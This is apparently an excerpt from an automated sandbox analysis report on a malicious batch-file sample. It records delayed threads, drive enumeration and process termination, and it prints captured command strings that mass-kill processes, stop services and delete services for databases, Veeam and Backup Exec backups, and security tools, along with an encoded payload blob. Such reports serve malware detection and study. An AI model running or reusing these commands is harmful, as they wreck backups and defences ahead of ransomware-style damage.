        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_004055AC __EH_prolog3_GS,CreateIoCompletionPort,GetSystemInfo,CreateThread,CreateThread,wnsprintfW,GetDriveTypeW,wnsprintfW,GetDiskFreeSpaceExW,PostQueuedCompletionStatus,WaitForMultipleObjects,CloseHandle,CloseHandle,GetLogicalDrives,wnsprintfW,GetDriveTypeW,wnsprintfW,CreateThread,WaitForMultipleObjects,CloseHandle,GetLogicalDrives,wnsprintfW,GetDriveTypeW,wnsprintfW,CreateThread,WaitForMultipleObjects,CloseHandle,OpenProcess,TerminateProcess,CloseHandle,Sleep,lstrlenW,lstrcpyW,PostQueuedCompletionStatus,Sleep,WaitForSingleObject,CloseHandle,PostQueuedCompletionStatus,WaitForMultipleObjects,CloseHandle,CloseHandle,10_2_004055AC
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 180000Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1800000Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 3600000Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 7200000Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 18000000Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Program Files\Adobe\Acrobat DCJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Program Files\Adobe\NULLJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Program Files\Adobe\Acrobat DC\AcrobatJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdfJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\NULLJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Program Files\Adobe\Acrobat DC\NULLJump to behavior
        Source: cmd.exe, 00000008.00000003.2529863416.0000000002B31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ler.exe /F & @taskkill /IM GoogleCrashHandler64.exe /F & @taskkill /IM GoogleUpdate.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM "FileZilla server.exe" /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM Admin.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM tomcat7.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM Kingdee.K3.CRM.MMC.MMCService.exe /F & @taskkill /IM Kingdee.k3.Weixin.ClientService.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM ImtsEventSvr.exe /F & @taskkill /IM mysqld-nt.exe /F & @taskkill /IM 360EnterpriseDiskUI.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM tomcat8.exe /F & @taskkill /IM QQprotect.exe /F & @taskkill /IM isqlplussvc.exe /F & @taskkill /IM nmesrvc.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM jusched.exe /F & @taskkill /IM MtxHotPlugService.exe /F & @taskkill /IM jucheck.exe /F & @taskkill /IM wordpad.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM chrome.exe /F & @taskkill /IM Thunder.exe /F"
        Source: cmd.exe, 00000008.00000003.2520088523.0000000002B40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c "color a & @net stop HaoZipSvc & @net stop "igfxCUIService2.0.0.0" & @net stop Realtek11nSU & @net stop xenlite & @net stop XenSvc & @net stop Apache2.2 & @net stop "Synology Drive VSS Service x64" & @net stop DellDRLogSvc & @net stop FirebirdGuardianDeafaultInstance & @net stop JWEM3DBAUTORun & @net stop JWRinfoClientService & @net stop JWService & @net stop Service2 & @net stop RapidRecoveryAgent & @net stop FirebirdServerDefaultInstance & @net stop AdobeARMservice & @net stop VeeamCatalogSvc & @net stop VeeanBackupSvc & @net stop VeeamTransportSvc & @net stop TPlusStdAppService1300 & @net stop TPlusStdTaskService1300 & @net stop TPlusStdUpgradeService1300 & @net stop TPlusStdWebService1300 & @net stop VeeamNFSSvc & @net stop VeeamDeploySvc & @net stop VeeamCloudSvc & @net stop VeeamMountSvc & @net stop VeeamBrokerSvc & @net stop VeeamDistributionSvc & @net stop tmlisten & @net stop ServiceMid & @net stop 360EntPGSvc & @net stop ClickToRunSvc & @net stop RavTask & @net stop AngelOfDeath & @net stop d_safe & @net stop NFLicenceServer & @net stop "NetVault Process Manager" & @net stop RavService & @net stop DFServ & @net stop IngressMgr & @net stop EvtSys & @net stop K3ClouManager & @net stop NFVPrintServer & @net stop RTCAVMCU & @net stop CobianBackup10 & @net stop GNWebService & @net stop Mysoft.SchedulingService & @net stop AgentX & @net stop SentinelKeysServer & @net stop DGPNPSEV & @net stop TurboCRM70 & @net stop NFSysService & @net stop U8DispatchService & @net stop NFOTPService & @net stop U8EISService & @net stop U8EncryptService & @net stop U8GCService & @net stop U8KeyManagePool & @net stop U8MPool & @net stop U8SCMPool & @net stop U8SLReportService & @net stop U8TaskService & @net stop U8WebPool & @net stop UFAllNet & @net stop UFReportService & @net stop UTUService"
        Source: cmd.exe, 00000008.00000003.2498862092.0000000002B40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c "color b & @sc delete "UWS LoPriv Services" & @sc delete ftnlsv3 & @sc delete ftnlses3 & @sc delete FxService & @sc delete "UtilDev Web Server Pro" & @sc delete ftusbrdwks & @sc delete ftusbrdsrv & @sc delete "ZTE USBIP Client Guard" & @sc delete "ZTE USBIP Client" & @sc delete "ZTE FileTranS" & @sc delete wwbizsrv & @sc delete qemu-ga & @sc delete AlibabaProtect & @sc delete ZTEVdservice & @sc delete kbasesrv & @sc delete MMRHookService & @sc delete OracleJobSchedulerORCL & @sc delete IpOverUsbSvc & @sc delete MsDtsServer100 & @sc delete KuaiYunTools & @sc delete KMSELDI & @sc delete btPanel & @sc delete Protect_2345Explorer & @sc delete 2345PicSvc & @sc delete vmware-converter-agent & @sc delete vmware-converter-server & @sc delete vmware-converter-worker & @sc delete QQCertificateService & @sc delete OracleRemExecService & @sc delete GPSDaemon & @sc delete GPSUserSvr & @sc delete GPSDownSvr & @sc delete GPSStorageSvr & @sc delete GPSDataProcSvr & @sc delete GPSGatewaySvr & @sc delete GPSMediaSvr & @sc delete GPSLoginSvr & @sc delete GPSTomcat6 & @sc delete GPSMysqld & @sc delete GPSFtpd & @sc delete "Zabbix Agent" & @sc delete BackupExecAgentAccelerator & @sc delete bedbg & @sc delete BackupExecDeviceMediaService & @sc delete BackupExecRPCService & @sc delete BackupExecAgentBrowser & @sc delete BackupExecJobuser & @sc delete BackupExecManagementService & @sc delete MDM & @sc delete TxQBService & @sc delete Gailun_Downloader & @sc delete RemoteAssistService & @sc delete YunService & @sc delete Serv-U & @sc delete "EasyFZS Server" & @sc delete "Rpc Monitor" & @sc delete OpenFastAssist & @sc delete "Nuo Update Monitor" & @sc delete "Daemon Service" & @sc delete asComSvc & @sc delete OfficeUpdateService & @sc delete RtcSrv & @sc delete RTCASMCU & @sc delete FTA & @sc delete MASTER & @sc delete NscAuthService & @sc delete MSCRMUnzipService & @sc delete MSCRMAsyncService$maintenance"
        Source: cmd.exe, 00000008.00000003.2545712731.00000000027C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ll /IM fsnotifier.exe /F & @taskkill /IM picpick.exe /F & @taskkill /IM lantern.exe /F & @taskkill /IM sysproxy-cmd.exe /F & @taskkill /IM service.exe /F & @taskkill /IM pcas.exe /F & @taskkill /IM PresentationFontCache.exe /F & @taskkill /IM RtWlan.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM Correspond.exe /F & @taskkill /IM ChatServer.exe /F & @taskkill /IM InetMgr.exe /F & @taskkill /IM LogonServer.exe /F & @taskkill /IM GameServer.exe /F & @taskkill /IM ServUAdmin.exe /F & @taskkill /IM ServUDaemon.exe /F & @taskkill /IM update0.exe /F & @taskkill /IM server.exe /F & @taskkill /IM w3wp.exe /F & @taskkill /IM notepad.exe /F & @taskkill /IM PalmInputService.exe /F & @taskkill /IM PalmInputGuard.exe /F & @taskkill /IM UpdateServer.exe /F & @taskkill /IM UpdateGate.exe /F & @taskkill /IM DBServer.exe /F & @taskkill /IM LoginGate.exe /F & @taskkill /IM SelGate.exe /F & @taskkill /IM RunGate.exe /F & @taskkill /IM M2Server.exe /F & @taskkill /IM LogDataServer.exe /F & @taskkill /IM LoginSrv.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM ClamWin.exe /F & @taskkill /IM srvany.exe /F & @taskkill /IM JT_AG-8332.exe /F & @taskkill /IM XXTClient.exe /F & @taskkill /IM clean.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM "Net.Service.exe" /F & @taskkill /IM plsqldev.exe /F & @taskkill /IM splwow64.exe /F & @taskkill /IM Oobe.exe /F & @taskkill /IM QQYService.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM SGTool.exe /F & @taskkill /IM postgres.exe /F & @taskkill /IM AppVShNotify.exe /F & @taskkill /IM OfficeClickToRun.exe /F & @taskkill /IM EntDT.exe /F & @taskkill /IM EntPublish.exe /F"
        Source: cmd.exe, 00000008.00000003.2533615018.00000000027C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: killercmd/c"color e & @taskkill /IM sqlservr.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM java.exe /F & @taskkill /IM fdhost.exe /F & @taskkill /IM fdlauncher.exe /F & @taskkill /IM Veeam.Backup.Service.exe /F & @taskkill /IM reportingservicesservice.exe /F & @taskkill /IM softmgrlite.exe /F & @taskkill /IM sqlbrowser.exe /F & @taskkill /IM ssms.exe /F & @taskkill /IM vmtoolsd.exe /F & @taskkill /IM baidunetdisk.exe /F & @taskkill /IM yundetectservice.exe /F & @taskkill /IM ssclient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM RAVCp164.exe /F & @taskkill /IM igfxEM.exe /F & @taskkill /IM igfxHK.exe /F & @taskkill /IM igfxTray.exe /F & @taskkill /IM 360bdoctor.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM PrivacyIconClient.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM GoogleCrashHandler.exe /F & @taskkill /IM GoogleCrashHandler64.exe /F & @taskkill /IM GoogleUpdate.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM "FileZillaserver.exe" /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM Admin.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM tomcat7.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM Kingdee.K3.CRM.MMC.MMCService.exe /F & @taskkill /IM Kingdee.k3.Weixin.ClientService.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM ImtsEventSvr.exe /F & @taskkill /IM mysqld-nt.exe /F & @taskkill /IM 360EnterpriseDiskUI.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM tomcat8.
        Source: cmd.exe, 00000008.00000003.2455995387.0000000002B30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete QcSoftService & @sc delete MSSQLServerOLAPService & @sc delete VMTools & @sc delete VGAuthService & @sc delete MSDTC & @sc delete TeamViewer & @sc delete ReportServer & @sc delete RabbitMQ & @sc delete "AHS SERVICE" & @sc delete "Sense Shield Service" & @sc delete SSMonitorService & @sc delete SSSyncService & @sc delete TPlusStdAppService1300 & @sc delete MSSQL$SQL2008 & @sc delete SQLAgent$SQL2008 & @sc delete TPlusStdTaskService1300 & @sc delete TPlusStdUpgradeService1300 & @sc delete VirboxWebServer & @sc delete jhi_service & @sc delete LMS & @sc delete "FontCache3.0.0.0" & @sc delete "OSP Service""
        Source: MSBuild.exe, 0000000A.00000002.3371150493.00000000048B8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3371150493.000000000486F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: R1TftmQpuQ.batBinary or memory string: 4QC2FQAdBsOC7URQJu3b+4zbxeVJ7PohRfFkPe5QmwXK2wPhwXww0jduSZ+gfxe0v2m2DMRUQB/D3jYxR++J7eeM5GwD2pXgOxWW+9i9TxNHd94yFXgex6KIeOb/iatukO3lbMvuO3ZTrXD8OTwjOU2A3vX7GUNswR/bxdnBtvPzO7Ycnk0BHvO2iaP7/t0azzlcu+Aic0TpV+gT8j6TwLIAtNEce/oCeEiK6/XxqMnv/RCjXLU8wU/uQjzmyBc9D9E8o9iEPPyuA+T+Tx2iI3Ro72DdAa8F3Ien9S0Txb3ckyeYlitqhezX4Beuh7fsk/9aZ9mvdaao0WedBSTOBNAQnEu14yUU59vyUoFpOYSvqCqiYdT5YwcBeOe/ZC6wtvi33QTmDYXwv2OEwfzK/XsAIzd0ZFvH80LsdacI0wkrIXs2kpGug/YHU/Txw2cb20LP33DIOG69bRqudQXTxzt5d8fnQIv3+oA04XMW9aZPmA4R/HHkbI9DOXb7HBB6u/g1Vr3J3vekvRbzhxSPIQq0r3cdoO/wbxfb/65kzs1ePkG5VcH4sf/WCvfBxD5kFClDYfhbwmcsLDuSsjEuOyL6EliI+Hl6+cwhmFtsfxR3qI9gbXz3cYzhw1wM2SdvAo9i4T9xLf1eJTIr3H+Il6tYh9UchGfsM1viWA/sz93rg1A/dX7sUWibbEa/eA+45uk7xuiz53E7Eo9zcZx7fyexmsCYrV/PzrwLeCUY27SnreAexs6f/S++hnPlYNoC5kBG+RuqNRivXvR0UlE+dAzm3iH8EdBnHJPw/cx/r/tvuAUcgzxHePyCC23jh97/DN5j+oOeD6B/hgNoJKbv5Bf5g6pVL2/csT8l4F04lw2RP8i6aCRB/90/+Lv49Qzusd9jw+thqaj/GA8+9/yFK7wPBzrRicAakjx4T+
        Source: cmd.exe, 00000008.00000003.2557013274.0000000002B40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c "color e & @taskkill /IM pg_ctl.exe /F & @taskkill /IM rcrelay.exe /F & @taskkill /IM SogouImeBroker.exe /F & @taskkill /IM CCenter.exe /F & @taskkill /IM ScanFrm.exe /F & @taskkill /IM d_manage.exe /F & @taskkill /IM RsTray.exe /F & @taskkill /IM wampmanager.exe /F & @taskkill /IM RavTray.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM sqlmangr.exe /F & @taskkill /IM msftesql.exe /F & @taskkill /IM SyncBaseSvr.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM SyncBaseConsole.exe /F & @taskkill /IM aspnet_state.exe /F & @taskkill /IM AutoBackUpEx.exe /F & @taskkill /IM redis-server.exe /F & @taskkill /IM MySQLNotifier.exe /F & @taskkill /IM oravssw.exe /F & @taskkill /IM fppdis5.exe /F & @taskkill /IM His6Service.exe /F & @taskkill /IM dinotify.exe /F & @taskkill /IM JhTask.exe /F & @taskkill /IM Executer.exe /F & @taskkill /IM AllPassCBHost.exe /F & @taskkill /IM ap_nginx.exe /F & @taskkill /IM AndroidServer.exe /F & @taskkill /IM XT.exe /F & @taskkill /IM XTService.exe /F & @taskkill /IM AllPassMCService.exe /F & @taskkill /IM IMEDICTUPDATE.exe /F & @taskkill /IM FlashHelperService.exe /F & @taskkill /IM ap_redis-server.exe /F & @taskkill /IM UtilDev.WebServer.Monitor.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM FoxitProtect.exe /F & @taskkill /IM ftnlses.exe /F & @taskkill /IM ftusbrdwks.exe /F & @taskkill /IM ftusbrdsrv.exe /F & @taskkill /IM ftnlsv.exe /F & @taskkill /IM Syslogd_Service.exe /F & @taskkill /IM UWS.HighPrivilegeUtilities.exe /F & @taskkill /IM ftusbsrv.exe /F & @taskkill /IM UWS.LowPrivilegeUtilities.exe /F & @taskkill /IM UWS.AppHost.Clr2.AnyCpu.exe /F & @taskkill /IM winguard_x64.exe /F & @taskkill /IM vmconnect.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM firefox.exe /F & @taskkill /IM usbrdsrv.exe /F & @taskkill /IM usbserver.exe /F & @taskkill /IM Foxmail.exe /F & @taskkill /IM qemu-ga.exe /F & @taskkill /IM wwbizsrv.exe /F & @taskkill /IM ZTEFileTranS.exe /F & @taskkill /IM ZTEUsbIpc.exe /F & @taskkill /IM ZTEUsbIpcGuard.exe /F & @taskkill /IM AlibabaProtect.exe /F & @taskkill /IM kbasesrv.exe /F & @taskkill /IM ZTEVdservice.exe /F & @taskkill /IM MMRHookService.exe /F & @taskkill /IM extjob.exe /F & @taskkill /IM IpOverUsbSvc.exe /F & @taskkill /IM VMwareTray.exe /F & @taskkill /IM devenv.exe /F & @taskkill /IM PerfWatson2.exe /F & @taskkill /IM ServiceHub.Host.Node.x86.exe /F & @taskkill /IM ServiceHub.IdentityHost.exe /F & @taskkill /IM ServiceHub.VSDetouredHost.exe /F & @taskkill /IM ServiceHub.SettingsHost.exe /F & @taskkill /IM ServiceHub.Host.CLR.x86.exe /F & @taskkill /IM ServiceHub.RoslynCodeAnalysisService32.exe /F & @taskkill /IM ServiceHub.DataWarehouseHost.exe /F & @taskkill /IM Microsoft.VisualStudio.Web.Host.exe /F & @taskkill /IM SQLEXPRWT.exe /F & @taskkill /IM setup.exe /F & @taskkill /IM remote.exe /F & @taskkill /IM setup100.exe /F & @taskkill /IM landingpage.exe /F & @taskkill /IM WINWORD.exe /F & @taskkill /IM K
        Source: cmd.exe, 00000008.00000003.2544633612.0000000002B31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Cpl64.exe /F & @taskkill /IM secbizsrv.exe /F & @taskkill /IM aliwssv.exe /F & @taskkill /IM Helper_Haozip.exe /F & @taskkill /IM acrotray.exe /F & @taskkill /IM "FileZilla Server Interface.exe" /F & @taskkill /IM YoudaoNote.exe /F & @taskkill /IM YNoteCefRender.exe /F & @taskkill /IM idea.exe /F & @taskkill /IM fsnotifier.exe /F & @taskkill /IM picpick.exe /F & @taskkill /IM lantern.exe /F & @taskkill /IM sysproxy-cmd.exe /F & @taskkill /IM service.exe /F & @taskkill /IM pcas.exe /F & @taskkill /IM PresentationFontCache.exe /F & @taskkill /IM RtWlan.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM Correspond.exe /F & @taskkill /IM ChatServer.exe /F & @taskkill /IM InetMgr.exe /F & @taskkill /IM LogonServer.exe /F & @taskkill /IM GameServer.exe /F & @taskkill /IM ServUAdmin.exe /F & @taskkill /IM ServUDaemon.exe /F & @taskkill /IM update0.exe /F & @taskkill /IM server.exe /F & @taskkill /IM w3wp.exe /F & @taskkill /IM notepad.exe /F & @taskkill /IM PalmInputService.exe /F & @taskkill /IM PalmInputGuard.exe /F & @taskkill /IM UpdateServer.exe /F & @taskkill /IM UpdateGate.exe /F & @taskkill /IM DBServer.exe /F & @taskkill /IM LoginGate.exe /F & @taskkill /IM SelGate.exe /F & @taskkill /IM RunGate.exe /F & @taskkill /IM M2Server.exe /F & @taskkill /IM LogDataServer.exe /F & @taskkill /IM LoginSrv.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM ClamWin.exe /F & @taskkill /IM srvany.exe /F & @taskkill /IM JT_AG-8332.exe /F & @taskkill /IM XXTClient.exe /F & @taskkill /IM clean.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM "Net.Service.exe" /F & @taskkill /IM plsqldev.exe /F & @taskkill /IM splwow64.exe /F & @taskkill /IM Oobe.exe /F & @taskkill /IM QQYService.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM SGTool.exe /F & @taskkill /IM postgres.exe /F & @taskkill /IM AppVShNotify.exe /F & @taskkill /IM OfficeClickToRun.exe /F & @taskkill /IM EntDT.exe /F & @taskkill /IM EntPublish.exe /F"
        Source: cmd.exe, 00000008.00000003.2528919407.0000000002B40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c "color a & @net stop UIODetect & @net stop VMwareHostd & @net stop TeamViewer8 & @net stop VMUSBArbService & @net stop VMAuthdService & @net stop wanxiao-monitor & @net stop WebAttendServer & @net stop mysqltransport & @net stop VMnetDHCP & @net stop "VMware NAT Service" & @net stop Tomcat8 & @net stop TeamViewer & @net stop QPCore & @net stop CASLicenceServer & @net stop CASWebServer & @net stop AutoUpdateService & @net stop "Alibaba Security Aegis Detect Service" & @net stop "Alibaba Security Aegis Update Service" & @net stop "AliyunService" & @net stop CASXMLService & @net stop AGSService & @net stop RapService & @net stop DDNSService & @net stop iNethinkSQLBackupSvc & @net stop CASVirtualDiskService & @net stop CASMsgSrv & @net stop "OracleOraDb10g_homeliSQL*Plus" & @net stop OracleDBConsoleilas & @net stop MySQL & @net stop TPlusStdAppService1220 & @net stop TPlusStdTaskService1220 & @net stop TPlusStdUpgradeService1220 & @net stop K3MobileServiceManage & @net stop "FileZilla Server" & @net stop DDVRulesProcessor & @net stop ImtsEventSvr & @net stop AutoUpdatePatchService & @net stop OMAILREPORT & @net stop "Dell Hardware Support" & @net stop SupportAssistAgent & @net stop K3MMainSuspendService & @net stop KpService & @net stop ceng_web_svc_d & @net stop KugouService & @net stop pcas & @net stop U8SendMailAdmin & @net stop "Bonjour Service" & @net stop "Apple Mobile Device Service" & @net stop "ABBYY.Licensing.FineReader.Professional.12.0""
        Source: cmd.exe, 00000008.00000003.2529894852.0000000002B30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "color e & @taskkill /IM sqlservr.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM java.exe /F & @taskkill /IM fdhost.exe /F & @taskkill /IM fdlauncher.exe /F & @taskkill /IM Veeam.Backup.Service.exe /F & @taskkill /IM reportingservicesservice.exe /F & @taskkill /IM softmgrlite.exe /F & @taskkill /IM sqlbrowser.exe /F & @taskkill /IM ssms.exe /F & @taskkill /IM vmtoolsd.exe /F & @taskkill /IM baidunetdisk.exe /F & @taskkill /IM yundetectservice.exe /F & @taskkill /IM ssclient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM RAVCp164.exe /F & @taskkill /IM igfxEM.exe /F & @taskkill /IM igfxHK.exe /F & @taskkill /IM igfxTray.exe /F & @taskkill /IM 360bdoctor.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM PrivacyIconClient.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM GoogleCrashHand
        Source: MSBuild.exe, 0000000A.00000002.3357750284.0000000000BB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
